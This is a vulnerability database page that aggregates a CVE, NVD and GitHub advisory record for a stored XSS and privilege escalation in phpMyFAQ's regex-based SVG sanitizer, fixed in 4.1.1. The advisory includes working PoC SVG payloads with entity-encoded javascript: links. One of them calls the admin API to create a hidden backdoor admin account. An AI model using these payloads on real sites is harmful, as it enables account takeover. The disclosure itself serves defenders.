Vulnerability-Lookup

CVE-2026-34974 (GCVE-0-2026-34974)

Vulnerability from cvelistv5 – Published: 2026-04-02 14:48 – Updated: 2026-04-02 16:22

Title

phpMyFAQ: SVG Sanitizer Bypass via HTML Entity Encoding leads to Stored XSS and Privilege Escalation

Summary

phpMyFAQ is an open source FAQ web application. Prior to version 4.1.1, the regex-based SVG sanitizer in phpMyFAQ (SvgSanitizer.php) can be bypassed using HTML entity encoding in javascript: URLs within SVG <a href> attributes. Any user with edit_faq permission can upload a malicious SVG that executes arbitrary JavaScript when viewed, enabling privilege escalation from editor to full admin takeover. This issue has been patched in version 4.1.1.

Severity ?

5.4 (Medium)


                        
                          CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N

CWE

CWE-79 - Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

Assigner

GitHub_M

References

URL

Tags

	https://github.com/thorsten/phpMyFAQ/security/adv…	x_refsource_CONFIRM
	https://github.com/thorsten/phpMyFAQ/releases/tag/4.1.1	x_refsource_MISC

Impacted products

	Vendor	Product	Version
	thorsten	phpMyFAQ	Affected: < 4.1.1

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2026-34974",
                "options": [
                  {
                    "Exploitation": "poc"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2026-04-02T16:16:00.518178Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2026-04-02T16:22:14.990Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "references": [
          {
            "tags": [
              "exploit"
            ],
            "url": "https://github.com/thorsten/phpMyFAQ/security/advisories/GHSA-5crx-pfhq-4hgg"
          }
        ],
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "phpMyFAQ",
          "vendor": "thorsten",
          "versions": [
            {
              "status": "affected",
              "version": "\u003c 4.1.1"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "phpMyFAQ is an open source FAQ web application. Prior to version 4.1.1, the regex-based SVG sanitizer in phpMyFAQ (SvgSanitizer.php) can be bypassed using HTML entity encoding in javascript: URLs within SVG \u003ca href\u003e attributes. Any user with edit_faq permission can upload a malicious SVG that executes arbitrary JavaScript when viewed, enabling privilege escalation from editor to full admin takeover. This issue has been patched in version 4.1.1."
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "NONE",
            "baseScore": 5.4,
            "baseSeverity": "MEDIUM",
            "confidentialityImpact": "LOW",
            "integrityImpact": "LOW",
            "privilegesRequired": "LOW",
            "scope": "CHANGED",
            "userInteraction": "REQUIRED",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
            "version": "3.1"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-79",
              "description": "CWE-79: Improper Neutralization of Input During Web Page Generation (\u0027Cross-site Scripting\u0027)",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-04-02T14:48:22.619Z",
        "orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
        "shortName": "GitHub_M"
      },
      "references": [
        {
          "name": "https://github.com/thorsten/phpMyFAQ/security/advisories/GHSA-5crx-pfhq-4hgg",
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://github.com/thorsten/phpMyFAQ/security/advisories/GHSA-5crx-pfhq-4hgg"
        },
        {
          "name": "https://github.com/thorsten/phpMyFAQ/releases/tag/4.1.1",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/thorsten/phpMyFAQ/releases/tag/4.1.1"
        }
      ],
      "source": {
        "advisory": "GHSA-5crx-pfhq-4hgg",
        "discovery": "UNKNOWN"
      },
      "title": "phpMyFAQ: SVG Sanitizer Bypass via HTML Entity Encoding leads to Stored XSS and Privilege Escalation"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
    "assignerShortName": "GitHub_M",
    "cveId": "CVE-2026-34974",
    "datePublished": "2026-04-02T14:48:22.619Z",
    "dateReserved": "2026-03-31T19:38:31.616Z",
    "dateUpdated": "2026-04-02T16:22:14.990Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2",
  "vulnerability-lookup:meta": {
    "epss": {
      "cve": "CVE-2026-34974",
      "date": "2026-04-16",
      "epss": "0.0003",
      "percentile": "0.08564"
    },
    "nvd": "{\"cve\":{\"id\":\"CVE-2026-34974\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2026-04-02T15:16:51.903\",\"lastModified\":\"2026-04-06T16:09:58.670\",\"vulnStatus\":\"Analyzed\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"phpMyFAQ is an open source FAQ web application. Prior to version 4.1.1, the regex-based SVG sanitizer in phpMyFAQ (SvgSanitizer.php) can be bypassed using HTML entity encoding in javascript: URLs within SVG \u003ca href\u003e attributes. Any user with edit_faq permission can upload a malicious SVG that executes arbitrary JavaScript when viewed, enabling privilege escalation from editor to full admin takeover. This issue has been patched in version 4.1.1.\"}],\"metrics\":{\"cvssMetricV31\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N\",\"baseScore\":5.4,\"baseSeverity\":\"MEDIUM\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"LOW\",\"userInteraction\":\"REQUIRED\",\"scope\":\"CHANGED\",\"confidentialityImpact\":\"LOW\",\"integrityImpact\":\"LOW\",\"availabilityImpact\":\"NONE\"},\"exploitabilityScore\":2.3,\"impactScore\":2.7}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-79\"}]}],\"configurations\":[{\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:phpmyfaq:phpmyfaq:*:*:*:*:*:*:*:*\",\"versionEndExcluding\":\"4.1.1\",\"matchCriteriaId\":\"407BB5BA-44EA-49EB-8072-4ACD67864598\"}]}]}],\"references\":[{\"url\":\"https://github.com/thorsten/phpMyFAQ/releases/tag/4.1.1\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Product\"]},{\"url\":\"https://github.com/thorsten/phpMyFAQ/security/advisories/GHSA-5crx-pfhq-4hgg\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Exploit\",\"Vendor Advisory\"]},{\"url\":\"https://github.com/thorsten/phpMyFAQ/security/advisories/GHSA-5crx-pfhq-4hgg\",\"source\":\"134c704f-9b21-4f2e-91b3-4a467353bcc0\",\"tags\":[\"Exploit\",\"Vendor Advisory\"]}]}}"
  }
}

FKIE_CVE-2026-34974

Vulnerability from fkie_nvd - Published: 2026-04-02 15:16 - Updated: 2026-04-06 16:09

Severity ?

5.4 (Medium) - CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N

Summary

References

URL	Tags
security-advisories@github.com	https://github.com/thorsten/phpMyFAQ/releases/tag/4.1.1	Product
security-advisories@github.com	https://github.com/thorsten/phpMyFAQ/security/advisories/GHSA-5crx-pfhq-4hgg	Exploit, Vendor Advisory
134c704f-9b21-4f2e-91b3-4a467353bcc0	https://github.com/thorsten/phpMyFAQ/security/advisories/GHSA-5crx-pfhq-4hgg	Exploit, Vendor Advisory

Impacted products

	Vendor	Product	Version
	phpmyfaq	phpmyfaq	*

JSON

To clipboard

{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:phpmyfaq:phpmyfaq:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "407BB5BA-44EA-49EB-8072-4ACD67864598",
              "versionEndExcluding": "4.1.1",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "phpMyFAQ is an open source FAQ web application. Prior to version 4.1.1, the regex-based SVG sanitizer in phpMyFAQ (SvgSanitizer.php) can be bypassed using HTML entity encoding in javascript: URLs within SVG \u003ca href\u003e attributes. Any user with edit_faq permission can upload a malicious SVG that executes arbitrary JavaScript when viewed, enabling privilege escalation from editor to full admin takeover. This issue has been patched in version 4.1.1."
    }
  ],
  "id": "CVE-2026-34974",
  "lastModified": "2026-04-06T16:09:58.670",
  "metrics": {
    "cvssMetricV31": [
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "NONE",
          "baseScore": 5.4,
          "baseSeverity": "MEDIUM",
          "confidentialityImpact": "LOW",
          "integrityImpact": "LOW",
          "privilegesRequired": "LOW",
          "scope": "CHANGED",
          "userInteraction": "REQUIRED",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
          "version": "3.1"
        },
        "exploitabilityScore": 2.3,
        "impactScore": 2.7,
        "source": "security-advisories@github.com",
        "type": "Secondary"
      }
    ]
  },
  "published": "2026-04-02T15:16:51.903",
  "references": [
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Product"
      ],
      "url": "https://github.com/thorsten/phpMyFAQ/releases/tag/4.1.1"
    },
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Exploit",
        "Vendor Advisory"
      ],
      "url": "https://github.com/thorsten/phpMyFAQ/security/advisories/GHSA-5crx-pfhq-4hgg"
    },
    {
      "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
      "tags": [
        "Exploit",
        "Vendor Advisory"
      ],
      "url": "https://github.com/thorsten/phpMyFAQ/security/advisories/GHSA-5crx-pfhq-4hgg"
    }
  ],
  "sourceIdentifier": "security-advisories@github.com",
  "vulnStatus": "Analyzed",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-79"
        }
      ],
      "source": "security-advisories@github.com",
      "type": "Secondary"
    }
  ]
}

GHSA-5CRX-PFHQ-4HGG

Vulnerability from github – Published: 2026-04-01 23:42 – Updated: 2026-04-06 17:18

Summary

phpMyFAQ: SVG Sanitizer Bypass via HTML Entity Encoding Leads to Stored XSS and Privilege Escalation

Details

Summary

The regex-based SVG sanitizer in phpMyFAQ (SvgSanitizer.php) can be bypassed using HTML entity encoding in javascript: URLs within SVG <a href> attributes. Any user with edit_faq permission can upload a malicious SVG that executes arbitrary JavaScript when viewed, enabling privilege escalation from editor to full admin takeover.

Details

The file phpmyfaq/src/phpMyFAQ/Helper/SvgSanitizer.php (introduced 2026-01-15) uses regex patterns to detect dangerous content in uploaded SVG files. The regex for javascript: URL detection is:

/href\s*=\s*["\']javascript:[^"\']*["\']/i

This pattern matches the literal string javascript: but fails when the URL is HTML entity encoded. For example, javascript: decodes to javascript: in the browser, but does NOT match the regex. The isSafe() method returns true, so the SVG is accepted without sanitization.

Additionally, the DANGEROUS_ELEMENTS blocklist misses <animate>, <set>, and <use> elements which can also be used to execute JavaScript in SVG context.

Uploaded SVG files are served with Content-Type: image/svg+xml and no Content-Disposition: attachment header, so browsers render them inline and execute any JavaScript they contain.

The image upload endpoint (/admin/api/content/images) only requires the edit_faq permission — not full admin — so any editor-level user can upload malicious SVGs.

PoC

Basic XSS (confirmed working in Chrome 146 and Edge)

Login to phpMyFAQ admin panel with any account that has edit_faq permission
Navigate to Admin → Content → Add New FAQ
In the TinyMCE editor, click the image upload button
Upload this SVG file:

<?xml version="1.0" encoding="UTF-8"?>
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 200 200">
  <a href="&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;alert(document.domain)">
    <text x="20" y="50" font-size="16" fill="red">Click for XSS</text>
  </a>
</svg>

The SVG is uploaded to /content/user/images/<timestamp>_<filename>.svg
Open the SVG URL directly in a browser
Click the red text → alert(document.domain) executes

Privilege Escalation (Editor → Admin Takeover)

As editor, upload this SVG:

<?xml version="1.0" encoding="UTF-8"?>
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 500 300">
  <rect width="500" height="300" fill="#f8f9fa"/>
  <text x="250" y="100" text-anchor="middle" font-size="22" fill="#333">📋 System Notice</text>
  <a href="&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;fetch('/admin/api/user/add',{method:'POST',headers:{'Content-Type':'application/json'},body:JSON.stringify({userName:'backdoor',userPassword:'H4ck3d!',realName:'System',email:'evil@attacker.com','is-visible':false}),credentials:'include'}).then(r=>r.json()).then(d=>document.title='pwned')">
    <rect x="150" y="170" width="200" height="50" rx="8" fill="#0d6efd"/>
    <text x="250" y="200" text-anchor="middle" font-size="16" fill="white">View Update →</text>
  </a>
</svg>

Send the SVG URL to an admin
Admin opens URL, clicks "View Update →"
JavaScript creates backdoor admin user backdoor:H4ck3d!
Attacker logs in as backdoor with full admin privileges

Impact

This is a Stored Cross-Site Scripting (XSS) vulnerability that enables privilege escalation. Any user with edit_faq permission (editor role) can upload a weaponized SVG file. When an admin views the SVG, arbitrary JavaScript executes in their browser on the phpMyFAQ origin, allowing the attacker to: - Create backdoor admin accounts via the admin API - Exfiltrate phpMyFAQ configuration (database credentials, API tokens) - Modify or delete FAQ content - Achieve full admin account takeover The vulnerability affects all phpMyFAQ installations using the SvgSanitizer class (introduced 2026-01-15). Recommended fix: replace regex-based sanitization with a DOM-based allowlist approach, or serve SVG files with Content-Disposition: attachment to prevent inline rendering.

Severity ?

5.4 (Medium)


                  
                    CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N

Show details on source website

JSON

To clipboard

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 4.1.0"
      },
      "package": {
        "ecosystem": "Packagist",
        "name": "thorsten/phpmyfaq"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "4.1.1"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-34974"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-79"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-04-01T23:42:47Z",
    "nvd_published_at": "2026-04-02T15:16:51Z",
    "severity": "MODERATE"
  },
  "details": "### Summary\nThe regex-based SVG sanitizer in phpMyFAQ (`SvgSanitizer.php`) can be bypassed using HTML entity encoding in `javascript:` URLs within SVG `\u003ca href\u003e` attributes. Any user with `edit_faq` permission can upload a malicious SVG that executes arbitrary JavaScript when viewed, enabling privilege escalation from editor to full admin takeover.\n\n### Details\nThe file `phpmyfaq/src/phpMyFAQ/Helper/SvgSanitizer.php` (introduced 2026-01-15) uses regex patterns to detect dangerous content in uploaded SVG files. The regex for `javascript:` URL detection is:\n\n`/href\\s*=\\s*[\"\\\u0027]javascript:[^\"\\\u0027]*[\"\\\u0027]/i`\n\nThis pattern matches the literal string `javascript:` but fails when the URL is HTML entity encoded. For example, `\u0026#106;\u0026#97;\u0026#118;\u0026#97;\u0026#115;\u0026#99;\u0026#114;\u0026#105;\u0026#112;\u0026#116;\u0026#58;` decodes to `javascript:` in the browser, but does NOT match the regex. The `isSafe()` method returns `true`, so the SVG is accepted without sanitization.\n\nAdditionally, the `DANGEROUS_ELEMENTS` blocklist misses `\u003canimate\u003e`, `\u003cset\u003e`, and `\u003cuse\u003e` elements which can also be used to execute JavaScript in SVG context.\n\nUploaded SVG files are served with `Content-Type: image/svg+xml` and no `Content-Disposition: attachment` header, so browsers render them inline and execute any JavaScript they contain.\n\nThe image upload endpoint (`/admin/api/content/images`) only requires the `edit_faq` permission \u2014 not full admin \u2014 so any editor-level user can upload malicious SVGs.\n\n### PoC\n### Basic XSS (confirmed working in Chrome 146 and Edge)\n\n1. Login to phpMyFAQ admin panel with any account that has `edit_faq` permission\n2. Navigate to Admin \u2192 Content \u2192 Add New FAQ\n3. In the TinyMCE editor, click the image upload button\n4. Upload this SVG file:\n\n```xml\n\u003c?xml version=\"1.0\" encoding=\"UTF-8\"?\u003e\n\u003csvg xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 200 200\"\u003e\n  \u003ca href=\"\u0026#106;\u0026#97;\u0026#118;\u0026#97;\u0026#115;\u0026#99;\u0026#114;\u0026#105;\u0026#112;\u0026#116;\u0026#58;alert(document.domain)\"\u003e\n    \u003ctext x=\"20\" y=\"50\" font-size=\"16\" fill=\"red\"\u003eClick for XSS\u003c/text\u003e\n  \u003c/a\u003e\n\u003c/svg\u003e\n```\n\n5. The SVG is uploaded to `/content/user/images/\u003ctimestamp\u003e_\u003cfilename\u003e.svg`\n6. Open the SVG URL directly in a browser\n7. Click the red text \u2192 `alert(document.domain)` executes\n\n### Privilege Escalation (Editor \u2192 Admin Takeover)\n\n1. As editor, upload this SVG:\n\n```xml\n\u003c?xml version=\"1.0\" encoding=\"UTF-8\"?\u003e\n\u003csvg xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 500 300\"\u003e\n  \u003crect width=\"500\" height=\"300\" fill=\"#f8f9fa\"/\u003e\n  \u003ctext x=\"250\" y=\"100\" text-anchor=\"middle\" font-size=\"22\" fill=\"#333\"\u003e\ud83d\udccb System Notice\u003c/text\u003e\n  \u003ca href=\"\u0026#106;\u0026#97;\u0026#118;\u0026#97;\u0026#115;\u0026#99;\u0026#114;\u0026#105;\u0026#112;\u0026#116;\u0026#58;fetch(\u0027/admin/api/user/add\u0027,{method:\u0027POST\u0027,headers:{\u0027Content-Type\u0027:\u0027application/json\u0027},body:JSON.stringify({userName:\u0027backdoor\u0027,userPassword:\u0027H4ck3d!\u0027,realName:\u0027System\u0027,email:\u0027evil@attacker.com\u0027,\u0027is-visible\u0027:false}),credentials:\u0027include\u0027}).then(r=\u003er.json()).then(d=\u003edocument.title=\u0027pwned\u0027)\"\u003e\n    \u003crect x=\"150\" y=\"170\" width=\"200\" height=\"50\" rx=\"8\" fill=\"#0d6efd\"/\u003e\n    \u003ctext x=\"250\" y=\"200\" text-anchor=\"middle\" font-size=\"16\" fill=\"white\"\u003eView Update \u2192\u003c/text\u003e\n  \u003c/a\u003e\n\u003c/svg\u003e\n```\n\n2. Send the SVG URL to an admin\n3. Admin opens URL, clicks \"View Update \u2192\"\n4. JavaScript creates backdoor admin user `backdoor:H4ck3d!`\n5. Attacker logs in as `backdoor` with full admin privileges\n\n\n### Impact\nThis is a Stored Cross-Site Scripting (XSS) vulnerability that enables privilege escalation. Any user with `edit_faq` permission (editor role) can upload a weaponized SVG file. When an admin views the SVG, arbitrary JavaScript executes in their browser on the phpMyFAQ origin, allowing the attacker to:\n- Create backdoor admin accounts via the admin API\n- Exfiltrate phpMyFAQ configuration (database credentials, API tokens)\n- Modify or delete FAQ content\n- Achieve full admin account takeover\nThe vulnerability affects all phpMyFAQ installations using the `SvgSanitizer` class (introduced 2026-01-15). Recommended fix: replace regex-based sanitization with a DOM-based allowlist approach, or serve SVG files with `Content-Disposition: attachment` to prevent inline rendering.",
  "id": "GHSA-5crx-pfhq-4hgg",
  "modified": "2026-04-06T17:18:58Z",
  "published": "2026-04-01T23:42:47Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/thorsten/phpMyFAQ/security/advisories/GHSA-5crx-pfhq-4hgg"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-34974"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/thorsten/phpMyFAQ"
    },
    {
      "type": "WEB",
      "url": "https://github.com/thorsten/phpMyFAQ/releases/tag/4.1.1"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "phpMyFAQ: SVG Sanitizer Bypass via HTML Entity Encoding Leads to Stored XSS and Privilege Escalation"
}

Sightings

Author	Source	Type	Date

Nomenclature

Seen: The vulnerability was mentioned, discussed, or observed by the user.
Confirmed: The vulnerability has been validated from an analyst's perspective.
Published Proof of Concept: A public proof of concept is available for this vulnerability.
Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
Not confirmed: The user expressed doubt about the validity of the vulnerability.
Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.

Detection rules are retrieved from Rulezet.

Action not permitted

CVE-2026-34974 (GCVE-0-2026-34974)

FKIE_CVE-2026-34974

GHSA-5CRX-PFHQ-4HGG

Summary

Details

PoC

Basic XSS (confirmed working in Chrome 146 and Edge)

Privilege Escalation (Editor → Admin Takeover)

Impact

Tags

Sightings

Nomenclature